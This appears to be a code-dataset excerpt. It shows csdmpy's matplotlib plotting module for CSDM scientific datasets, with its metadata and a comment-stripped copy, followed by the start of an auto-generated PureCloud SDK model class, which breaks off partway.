__email__ = "srivastava.89@osu.edu"

scalar = ["scalar", "vector_1", "pixel_1", "matrix_1_1", "symmetric_matrix_1"]


def _get_label_from_dv(dv, i):
    """Return label along with the unit of the dependent variable

    Args:
        dv: DependentVariable object.
        i: integer counter.
    """
    name, unit = dv.name, dv.unit
    name = name if name != "" else str(i)
    label = f"{name} / ({unit})" if unit != "" else name
    return label


class CSDMAxes(plt.Axes):
    """A custom CSDM data plot axes."""

    name = "csdm"

    def plot(self, csdm, *args, **kwargs):
        """Generate a figure axes using the `plot` method from the matplotlib library.

        Apply to all 1D datasets with single-component dependent-variables. For
        multiple dependent variables, the data from individual dependent-variables is
        plotted on the same figure.

        Args:
            csdm: A CSDM object of a one-dimensional dataset.
            kwargs: Additional keyword arguments for the matplotlib plot() method.

        Example
        -------
        >>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
        >>> ax.plot(csdm_object) # doctest: +SKIP
        >>> plt.show() # doctest: +SKIP
        """
        if csdm.__class__.__name__ != "CSDM":
            return super().plot(csdm, *args, **kwargs)
        return self._call_1D(csdm, "plot", *args, **kwargs)

    def scatter(self, csdm, *args, **kwargs):
        """Generate a figure axes using the `scatter` method from the matplotlib
        library.

        Apply to all 1D datasets with single-component dependent-variables. For
        multiple dependent variables, the data from individual dependent-variables is
        plotted on the same figure.

        Args:
            csdm: A CSDM object of a one-dimensional dataset.
            kwargs: Additional keyword arguments for the matplotlib plot() method.

        Example
        -------
        >>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
        >>> ax.scatter(csdm_object) # doctest: +SKIP
        >>> plt.show() # doctest: +SKIP
        """
        if csdm.__class__.__name__ != "CSDM":
            return super().scatter(csdm, *args, **kwargs)
        return self._call_1D(csdm, "scatter", *args, **kwargs)

    def imshow(self, csdm, origin="lower", *args, **kwargs):
        """Generate a figure axes using the `imshow` method from the matplotlib library.

        Apply to all 2D datasets with either single-component (scalar),
        three-components (pixel_3), or four-components (pixel_4) dependent-variables.
        For single-component (scalar) dependent-variable, a colormap image is produced.
        For three-components (pixel_3) dependent-variable, an RGB image is produced.
        For four-components (pixel_4) dependent-variable, an RGBA image is produced.

        For multiple dependent variables, the data from individual dependent-variables
        is plotted on the same figure.

        Args:
            csdm: A CSDM object of a two-dimensional dataset with scalar, pixel_3, or
                pixel_4 quantity_type dependent variable.
            origin: The matplotlib `origin` argument. In matplotlib, the default is
                'upper'. In csdmpy, however, the default is 'lower'.
            kwargs: Additional keyword arguments for the matplotlib imshow() method.

        Example
        -------
        >>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
        >>> ax.imshow(csdm_object) # doctest: +SKIP
        >>> plt.show() # doctest: +SKIP
        """
        if csdm.__class__.__name__ != "CSDM":
            return super().imshow(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_image(csdm, origin=origin, *args, **kwargs)

    def contour(self, csdm, *args, **kwargs):
        """Generate a figure axes using the `contour` method from the matplotlib
        library.

        Apply to all 2D datasets with a single-component (scalar) dependent variable.
        For multiple dependent variables, the data from individual dependent-variables
        is plotted on the same figure.

        Args:
            csdm: A CSDM object of a two-dimensional dataset with scalar dependent
                variable.
            kwargs: Additional keyword arguments for the matplotlib contour() method.

        Example
        -------
        >>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
        >>> ax.contour(csdm_object) # doctest: +SKIP
        >>> plt.show() # doctest: +SKIP
        """
        if csdm.__class__.__name__ != "CSDM":
            return super().contour(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_contour(csdm, "contour", *args, **kwargs)

    def contourf(self, csdm, *args, **kwargs):
        """Generate a figure axes using the `contourf` method from the matplotlib
        library.

        Apply to all 2D datasets with a single-component (scalar) dependent variable.
        For multiple dependent variables, the data from individual dependent-variables
        is plotted on the same figure.

        Args:
            csdm: A CSDM object of a two-dimensional dataset with scalar dependent
                variable.
            kwargs: Additional keyword arguments for the matplotlib contourf() method.

        Example
        -------
        >>> ax = plt.subplot(projection='csdm') # doctest: +SKIP
        >>> ax.contourf(csdm_object) # doctest: +SKIP
        >>> plt.show() # doctest: +SKIP
        """
        if csdm.__class__.__name__ != "CSDM":
            return super().contourf(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_contour(csdm, "contourf", *args, **kwargs)

    def _call_1D(self, csdm, fn, *args, **kwargs):
        _check_1D_dataset(csdm)

        x = csdm.dimensions
        z = csdm.split()
        one = True if len(z) == 1 else False

        legend = False
        for i, item in enumerate(z):
            x_, y_ = item.to_list()
            # dv will always be at index 0 because we called the object.split() before.
            dv = item.dependent_variables[0]
            kwargs_ = deepcopy(kwargs)
            # add a default label if not provided by the user.
            if "label" not in kwargs_.keys():
                kwargs_["label"] = dv.name if one else _get_label_from_dv(dv, i)
            if kwargs_["label"] != "":
                legend = True
            if fn == "plot":
                r_plt = super().plot(x_, y_, *args, **kwargs_)
            if fn == "scatter":
                r_plt = super().scatter(x_, y_, *args, **kwargs_)

        self.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
        self.set_xlabel(x[0].axis_label)
        ylabel = dv.axis_label[0] if one else "dimensionless"
        self.set_ylabel(ylabel)
        # self.grid(color="gray", linestyle="--", linewidth=0.5)
        if legend:
            self.legend()
        return r_plt

    def _call_uniform_2D_contour(self, csdm, fn, *args, **kwargs):
        _check_2D_scalar_dataset(csdm)
        kw_keys = kwargs.keys()

        # set extent
        x = csdm.dimensions
        x0, x1 = x[0].coordinates.value, x[1].coordinates.value

        # add cmap for multiple dependent variables.
        cmaps_bool = False
        if "cmaps" in kw_keys:
            cmaps_bool = True
            cmaps = kwargs.pop("cmaps")

        one = True if len(csdm.dependent_variables) == 1 else False
        for i, dv in enumerate(csdm.dependent_variables):
            y = dv.components
            if dv.quantity_type == "scalar":
                if cmaps_bool:
                    kwargs["cmap"] = cmaps[i]
                if fn == "contour":
                    r_plt = super().contour(x0, x1, y[0], *args, **kwargs)
                if fn == "contourf":
                    r_plt = super().contourf(x0, x1, y[0], *args, **kwargs)

        self.set_xlim(x0.min(), x0.max())
        self.set_ylim(x1.min(), x1.max())
        self.set_xlabel(x[0].axis_label)
        self.set_ylabel(x[1].axis_label)
        if one:
            self.set_title(dv.name)
        return r_plt

    def _call_uniform_2D_image(self, csdm, *args, **kwargs):
        _check_2D_scalar_and_pixel_dataset(csdm)
        kw_keys = kwargs.keys()

        # set extent
        x = csdm.dimensions
        x0, x1 = x[0].coordinates.value, x[1].coordinates.value
        extent = [x0[0], x0[-1], x1[0], x1[-1]]
        if kwargs["origin"] == "upper":
            extent = [x0[0], x0[-1], x1[-1], x1[0]]
        if "extent" not in kw_keys:
            kwargs["extent"] = extent

        # add cmap for multiple dependent variables.
        cmaps_bool = False
        if "cmaps" in kw_keys:
            cmaps_bool = True
            cmaps = kwargs.pop("cmaps")

        one = True if len(csdm.dependent_variables) == 1 else False
        for i, dv in enumerate(csdm.dependent_variables):
            y = dv.components
            if dv.quantity_type == "scalar":
                if cmaps_bool:
                    kwargs["cmap"] = cmaps[i]
                r_plt = super().imshow(y[0], *args, **kwargs)
            if dv.quantity_type == "pixel_3":
                r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
            if dv.quantity_type == "pixel_4":
                r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)

        self.set_xlabel(x[0].axis_label)
        self.set_ylabel(x[1].axis_label)
        if one:
            self.set_title(dv.name)
        return r_plt


try:
    proj.register_projection(CSDMAxes)
except NameError:
    pass


def _check_1D_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 1D dataset with single-component dependent "
        "variables. For multiple dependent-variables, the data from all the "
        "dependent variables are plotted on the same figure."
    )
    if len(x) != 1:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) != 1:
            raise Exception(message)


def _check_2D_scalar_and_pixel_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 2D dataset with a single-component (scalar), "
        "three components (pixel_3), or four components (pixel_4) dependent "
        "variables. The pixel_3 produces an RGB image while pixel_4, a RGBA image."
    )
    if len(x) != 2:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) not in [1, 3, 4]:
            raise Exception(message)


def _check_2D_scalar_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 2D dataset with a single-component (scalar) "
        "dependent variable."
    )
    if len(x) != 2:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) != 1:
            raise Exception(message)


# --------- cp plot functions ---------- #
def _preview(data, reverse_axis=None, range_=None, **kwargs):
    """Quick display of the data."""
    if reverse_axis is not None:
        kwargs["reverse_axis"] = reverse_axis
    if range_ is None:
        range_ = [[None, None], [None, None]]

    x = data.dimensions
    y = data.dependent_variables
    y_len = len(y)
    y_grid = int(y_len / 2) + 1

    if len(x) == 0:
        raise NotImplementedError(
            "Preview of zero dimensional datasets is not implemented."
        )
    if len(x) > 2:
        raise NotImplementedError(
            "Preview of three or higher dimensional datasets is not implemented."
        )
    if np.any([x[i].type == "labeled" for i in range(len(x))]):
        raise NotImplementedError("Preview of labeled dimensions is not implemented.")

    fig = plt.gcf()
    if y_len <= 2:
        ax = fig.subplots(y_grid)
        ax = [[ax]] if y_len == 1 else [ax]
    else:
        ax = fig.subplots(y_grid, 2)

    if len(x) == 1:
        one_d_plots(ax, x, y, range_, **kwargs)
    if len(x) == 2:
        two_d_plots(ax, x, y, range_, **kwargs)
    return fig


def one_d_plots(ax, x, y, range_, **kwargs):
    """A collection of possible 1D plots."""
    for i, y_item in enumerate(y):
        i0 = int(i / 2)
        j0 = int(i % 2)
        ax_ = ax[i0][j0]
        if y_item.quantity_type in scalar:
            oneD_scalar(x, y_item, ax_, range_, **kwargs)
        if "vector" in y_item.quantity_type:
            vector_plot(x, y_item, ax_, range_, **kwargs)
        # if "audio" in y_item.quantity_type:
        #     audio(x, y, i, fig, ax, **kwargs)


def two_d_plots(ax, x, y, range_, **kwargs):
    """A collection of possible 2D plots."""
    for i, y_item in enumerate(y):
        i0 = int(i / 2)
        j0 = int(i % 2)
        ax_ = ax[i0][j0]
        if y_item.quantity_type == "pixel_3":
            warn("This method interprets the `pixel_3` dataset as an RGB image.")
            RGB_image(x, y_item, ax_, range_, **kwargs)
        if y_item.quantity_type in scalar:
            twoD_scalar(x, y_item, ax_, range_, **kwargs)
        if "vector" in y_item.quantity_type:
            vector_plot(x, y_item, ax_, range_, **kwargs)


def oneD_scalar(x, y, ax, range_, **kwargs):
    reverse = [False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    components = y.components.shape[0]
    for k in range(components):
        ax.plot(x[0].coordinates, y.components[k], **kwargs)
    ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_ylabel(y.axis_label[0])
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()


def twoD_scalar(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    x0 = x[0].coordinates.value
    x1 = x[1].coordinates.value
    y00 = y.components[0]
    extent = [x0[0], x0[-1], x1[0], x1[-1]]
    if "extent" not in kwargs.keys():
        kwargs["extent"] = extent

    if x[0].type == "linear" and x[1].type == "linear":
        if "origin" not in kwargs.keys():
            kwargs["origin"] = "lower"
        if "aspect" not in kwargs.keys():
            kwargs["aspect"] = "auto"
        cs = ax.imshow(y00, **kwargs)
    else:
        if "interpolation" not in kwargs.keys():
            kwargs["interpolation"] = "nearest"
        cs = NonUniformImage(ax, **kwargs)
        cs.set_data(x0, x1, y00)
        ax.images.append(cs)

    cbar = ax.figure.colorbar(cs, ax=ax)
    cbar.ax.minorticks_off()
    cbar.set_label(y.axis_label[0])
    ax.set_xlim([extent[0], extent[1]])
    ax.set_ylim([extent[2], extent[3]])
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_ylabel(f"{x[1].axis_label} - 1")
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()
    if reverse[1]:
        ax.invert_yaxis()


def vector_plot(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    x0 = x[0].coordinates.value
    if len(x) == 2:
        x1 = x[1].coordinates.value
    else:
        x1 = np.zeros(1)

    x0, x1 = np.meshgrid(x0, x1)
    u1 = y.components[0]
    v1 = y.components[1]
    if "pivot" not in kwargs.keys():
        kwargs["pivot"] = "middle"
    ax.quiver(x0, x1, u1, v1, **kwargs)
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
    if len(x) == 2:
        ax.set_ylim(x[1].coordinates.value.min(), x[1].coordinates.value.max())
        ax.set_ylabel(f"{x[1].axis_label} - 1")
        if reverse[1]:
            ax.invert_yaxis()
    else:
        ax.set_ylim([-y.components.max(), y.components.max()])
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()


def RGB_image(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    y0 = y.components
    ax.imshow(np.moveaxis(y0 / y0.max(), 0, -1), **kwargs)
    ax.set_title("{0}".format(y.name))

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()
    if reverse[1]:
        ax.invert_yaxis()


# def audio(x, y, i0, fig, ax):
#     try:
#         SOUND = 1
#         import sounddevice as sd
#     except ImportError:
#         SOUND = 0
#         string = (
#             "Module 'sounddevice' is not installed. All audio data files will "
#             "not be played. To enable audio files, install 'sounddevice' using"
#             " 'pip install sounddevice'."
#         )
#         warn(string)
#     plot1D(x, y, i0, ax)
#     if SOUND == 1:
#         data_max = y[i0].components.max()
#         sd.play(0.9 * y[i0].components.T / data_max, 1 / x[0].increment.to("s").value)
avg_line_length: 32.198569 | max_line_length: 88 | alphanum_fraction: 0.583755
content_no_comment:
from copy import deepcopy
from warnings import warn

import matplotlib.projections as proj
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.image import NonUniformImage

__author__ = "Deepansh J. Srivastava"
__email__ = "srivastava.89@osu.edu"

scalar = ["scalar", "vector_1", "pixel_1", "matrix_1_1", "symmetric_matrix_1"]


def _get_label_from_dv(dv, i):
    name, unit = dv.name, dv.unit
    name = name if name != "" else str(i)
    label = f"{name} / ({unit})" if unit != "" else name
    return label


class CSDMAxes(plt.Axes):
    name = "csdm"

    def plot(self, csdm, *args, **kwargs):
        if csdm.__class__.__name__ != "CSDM":
            return super().plot(csdm, *args, **kwargs)
        return self._call_1D(csdm, "plot", *args, **kwargs)

    def scatter(self, csdm, *args, **kwargs):
        if csdm.__class__.__name__ != "CSDM":
            return super().scatter(csdm, *args, **kwargs)
        return self._call_1D(csdm, "scatter", *args, **kwargs)

    def imshow(self, csdm, origin="lower", *args, **kwargs):
        if csdm.__class__.__name__ != "CSDM":
            return super().imshow(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_image(csdm, origin=origin, *args, **kwargs)

    def contour(self, csdm, *args, **kwargs):
        if csdm.__class__.__name__ != "CSDM":
            return super().contour(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_contour(csdm, "contour", *args, **kwargs)

    def contourf(self, csdm, *args, **kwargs):
        if csdm.__class__.__name__ != "CSDM":
            return super().contourf(csdm, *args, **kwargs)

        x = csdm.dimensions
        if x[0].type == "linear" and x[1].type == "linear":
            return self._call_uniform_2D_contour(csdm, "contourf", *args, **kwargs)

    def _call_1D(self, csdm, fn, *args, **kwargs):
        _check_1D_dataset(csdm)

        x = csdm.dimensions
        z = csdm.split()
        one = True if len(z) == 1 else False

        legend = False
        for i, item in enumerate(z):
            x_, y_ = item.to_list()
            dv = item.dependent_variables[0]
            kwargs_ = deepcopy(kwargs)
            if "label" not in kwargs_.keys():
                kwargs_["label"] = dv.name if one else _get_label_from_dv(dv, i)
            if kwargs_["label"] != "":
                legend = True
            if fn == "plot":
                r_plt = super().plot(x_, y_, *args, **kwargs_)
            if fn == "scatter":
                r_plt = super().scatter(x_, y_, *args, **kwargs_)

        self.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
        self.set_xlabel(x[0].axis_label)
        ylabel = dv.axis_label[0] if one else "dimensionless"
        self.set_ylabel(ylabel)
        if legend:
            self.legend()
        return r_plt

    def _call_uniform_2D_contour(self, csdm, fn, *args, **kwargs):
        _check_2D_scalar_dataset(csdm)
        kw_keys = kwargs.keys()

        x = csdm.dimensions
        x0, x1 = x[0].coordinates.value, x[1].coordinates.value

        cmaps_bool = False
        if "cmaps" in kw_keys:
            cmaps_bool = True
            cmaps = kwargs.pop("cmaps")

        one = True if len(csdm.dependent_variables) == 1 else False
        for i, dv in enumerate(csdm.dependent_variables):
            y = dv.components
            if dv.quantity_type == "scalar":
                if cmaps_bool:
                    kwargs["cmap"] = cmaps[i]
                if fn == "contour":
                    r_plt = super().contour(x0, x1, y[0], *args, **kwargs)
                if fn == "contourf":
                    r_plt = super().contourf(x0, x1, y[0], *args, **kwargs)

        self.set_xlim(x0.min(), x0.max())
        self.set_ylim(x1.min(), x1.max())
        self.set_xlabel(x[0].axis_label)
        self.set_ylabel(x[1].axis_label)
        if one:
            self.set_title(dv.name)
        return r_plt

    def _call_uniform_2D_image(self, csdm, *args, **kwargs):
        _check_2D_scalar_and_pixel_dataset(csdm)
        kw_keys = kwargs.keys()

        x = csdm.dimensions
        x0, x1 = x[0].coordinates.value, x[1].coordinates.value
        extent = [x0[0], x0[-1], x1[0], x1[-1]]
        if kwargs["origin"] == "upper":
            extent = [x0[0], x0[-1], x1[-1], x1[0]]
        if "extent" not in kw_keys:
            kwargs["extent"] = extent

        cmaps_bool = False
        if "cmaps" in kw_keys:
            cmaps_bool = True
            cmaps = kwargs.pop("cmaps")

        one = True if len(csdm.dependent_variables) == 1 else False
        for i, dv in enumerate(csdm.dependent_variables):
            y = dv.components
            if dv.quantity_type == "scalar":
                if cmaps_bool:
                    kwargs["cmap"] = cmaps[i]
                r_plt = super().imshow(y[0], *args, **kwargs)
            if dv.quantity_type == "pixel_3":
                r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
            if dv.quantity_type == "pixel_4":
                r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)

        self.set_xlabel(x[0].axis_label)
        self.set_ylabel(x[1].axis_label)
        if one:
            self.set_title(dv.name)
        return r_plt


try:
    proj.register_projection(CSDMAxes)
except NameError:
    pass


def _check_1D_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 1D dataset with single-component dependent "
        "variables. For multiple dependent-variables, the data from all the "
        "dependent variables are plotted on the same figure."
    )
    if len(x) != 1:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) != 1:
            raise Exception(message)


def _check_2D_scalar_and_pixel_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 2D dataset with a single-component (scalar), "
        "three components (pixel_3), or four components (pixel_4) dependent "
        "variables. The pixel_3 produces an RGB image while pixel_4, a RGBA image."
    )
    if len(x) != 2:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) not in [1, 3, 4]:
            raise Exception(message)


def _check_2D_scalar_dataset(csdm):
    x, y = csdm.dimensions, csdm.dependent_variables
    message = (
        "The function requires a 2D dataset with a single-component (scalar) "
        "dependent variable."
    )
    if len(x) != 2:
        raise Exception(message)
    for y_ in y:
        if len(y_.components) != 1:
            raise Exception(message)


def _preview(data, reverse_axis=None, range_=None, **kwargs):
    if reverse_axis is not None:
        kwargs["reverse_axis"] = reverse_axis
    if range_ is None:
        range_ = [[None, None], [None, None]]

    x = data.dimensions
    y = data.dependent_variables
    y_len = len(y)
    y_grid = int(y_len / 2) + 1

    if len(x) == 0:
        raise NotImplementedError(
            "Preview of zero dimensional datasets is not implemented."
        )
    if len(x) > 2:
        raise NotImplementedError(
            "Preview of three or higher dimensional datasets is not implemented."
        )
    if np.any([x[i].type == "labeled" for i in range(len(x))]):
        raise NotImplementedError("Preview of labeled dimensions is not implemented.")

    fig = plt.gcf()
    if y_len <= 2:
        ax = fig.subplots(y_grid)
        ax = [[ax]] if y_len == 1 else [ax]
    else:
        ax = fig.subplots(y_grid, 2)

    if len(x) == 1:
        one_d_plots(ax, x, y, range_, **kwargs)
    if len(x) == 2:
        two_d_plots(ax, x, y, range_, **kwargs)
    return fig


def one_d_plots(ax, x, y, range_, **kwargs):
    for i, y_item in enumerate(y):
        i0 = int(i / 2)
        j0 = int(i % 2)
        ax_ = ax[i0][j0]
        if y_item.quantity_type in scalar:
            oneD_scalar(x, y_item, ax_, range_, **kwargs)
        if "vector" in y_item.quantity_type:
            vector_plot(x, y_item, ax_, range_, **kwargs)


def two_d_plots(ax, x, y, range_, **kwargs):
    for i, y_item in enumerate(y):
        i0 = int(i / 2)
        j0 = int(i % 2)
        ax_ = ax[i0][j0]
        if y_item.quantity_type == "pixel_3":
            warn("This method interprets the `pixel_3` dataset as an RGB image.")
            RGB_image(x, y_item, ax_, range_, **kwargs)
        if y_item.quantity_type in scalar:
            twoD_scalar(x, y_item, ax_, range_, **kwargs)
        if "vector" in y_item.quantity_type:
            vector_plot(x, y_item, ax_, range_, **kwargs)


def oneD_scalar(x, y, ax, range_, **kwargs):
    reverse = [False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    components = y.components.shape[0]
    for k in range(components):
        ax.plot(x[0].coordinates, y.components[k], **kwargs)
    ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_ylabel(y.axis_label[0])
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()


def twoD_scalar(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    x0 = x[0].coordinates.value
    x1 = x[1].coordinates.value
    y00 = y.components[0]
    extent = [x0[0], x0[-1], x1[0], x1[-1]]
    if "extent" not in kwargs.keys():
        kwargs["extent"] = extent

    if x[0].type == "linear" and x[1].type == "linear":
        if "origin" not in kwargs.keys():
            kwargs["origin"] = "lower"
        if "aspect" not in kwargs.keys():
            kwargs["aspect"] = "auto"
        cs = ax.imshow(y00, **kwargs)
    else:
        if "interpolation" not in kwargs.keys():
            kwargs["interpolation"] = "nearest"
        cs = NonUniformImage(ax, **kwargs)
        cs.set_data(x0, x1, y00)
        ax.images.append(cs)

    cbar = ax.figure.colorbar(cs, ax=ax)
    cbar.ax.minorticks_off()
    cbar.set_label(y.axis_label[0])
    ax.set_xlim([extent[0], extent[1]])
    ax.set_ylim([extent[2], extent[3]])
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_ylabel(f"{x[1].axis_label} - 1")
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()
    if reverse[1]:
        ax.invert_yaxis()


def vector_plot(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    x0 = x[0].coordinates.value
    if len(x) == 2:
        x1 = x[1].coordinates.value
    else:
        x1 = np.zeros(1)

    x0, x1 = np.meshgrid(x0, x1)
    u1 = y.components[0]
    v1 = y.components[1]
    if "pivot" not in kwargs.keys():
        kwargs["pivot"] = "middle"
    ax.quiver(x0, x1, u1, v1, **kwargs)
    ax.set_xlabel(f"{x[0].axis_label} - 0")
    ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
    if len(x) == 2:
        ax.set_ylim(x[1].coordinates.value.min(), x[1].coordinates.value.max())
        ax.set_ylabel(f"{x[1].axis_label} - 1")
        if reverse[1]:
            ax.invert_yaxis()
    else:
        ax.set_ylim([-y.components.max(), y.components.max()])
    ax.set_title("{0}".format(y.name))
    ax.grid(color="gray", linestyle="--", linewidth=0.5)

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()


def RGB_image(x, y, ax, range_, **kwargs):
    reverse = [False, False]
    if "reverse_axis" in kwargs.keys():
        reverse = kwargs["reverse_axis"]
        kwargs.pop("reverse_axis")

    y0 = y.components
    ax.imshow(np.moveaxis(y0 / y0.max(), 0, -1), **kwargs)
    ax.set_title("{0}".format(y.name))

    ax.set_xlim(range_[0])
    ax.set_ylim(range_[1])

    if reverse[0]:
        ax.invert_xaxis()
    if reverse[1]:
        ax.invert_yaxis()
is_comment_constant_removed: true | is_sharp_comment_removed: true
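Because the module registers `CSDMAxes` under the projection name 'csdm' at import time, callers reach these methods through matplotlib's standard projection mechanism. A minimal sketch, assuming a dataset loaded with csdmpy ("dataset.csdf" is a placeholder file name):

# Sketch: using the registered 'csdm' projection with any CSDM-compliant file.
import matplotlib.pyplot as plt
import csdmpy as cp

csdm_object = cp.load("dataset.csdf")   # placeholder path

ax = plt.subplot(projection="csdm")     # returns a CSDMAxes instance
ax.plot(csdm_object)                    # dispatches to CSDMAxes.plot above
plt.show()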
hexsha: 1c445c09aba76bb2eb69badc9bf601edb0a0fe02 | size: 6,321 | ext: py | lang: Python
max_stars_repo: build/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | licenses: ["MIT"] | count: 10 | events: 2019-02-22T00:27:08.000Z to 2021-09-12T23:23:44.000Z
max_issues_repo: libs/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | licenses: ["MIT"] | count: 5 | events: 2018-06-07T08:32:00.000Z to 2021-07-28T17:37:26.000Z
max_forks_repo: libs/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | licenses: ["MIT"] | count: 6 | events: 2020-04-09T17:43:07.000Z to 2022-02-17T08:48:05.000Z
content:
# coding: utf-8

"""
Copyright 2016 SmartBear Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

Ref: https://github.com/swagger-api/swagger-codegen
"""

from pprint import pformat
from six import iteritems
import re
import json

from ..utils import sanitize_for_serialization


class DialerContactlistConfigChangeContactPhoneNumberColumn(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        DialerContactlistConfigChangeContactPhoneNumberColumn - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'column_name': 'str',
            'type': 'str',
            'callable_time_column': 'str',
            'additional_properties': 'object'
        }

        self.attribute_map = {
            'column_name': 'columnName',
            'type': 'type',
            'callable_time_column': 'callableTimeColumn',
            'additional_properties': 'additionalProperties'
        }

        self._column_name = None
        self._type = None
        self._callable_time_column = None
        self._additional_properties = None

    @property
    def column_name(self):
        """
        Gets the column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :return: The column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :rtype: str
        """
        return self._column_name

    @column_name.setter
    def column_name(self, column_name):
        """
        Sets the column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :param column_name: The column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :type: str
        """
        self._column_name = column_name

    @property
    def type(self):
        """
        Gets the type of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :return: The type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, type):
        """
        Sets the type of this DialerContactlistConfigChangeContactPhoneNumberColumn.

        :param type: The type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
        :type: str
        """
        self._type = type

    @property
    def callable_time_column(self):
        """
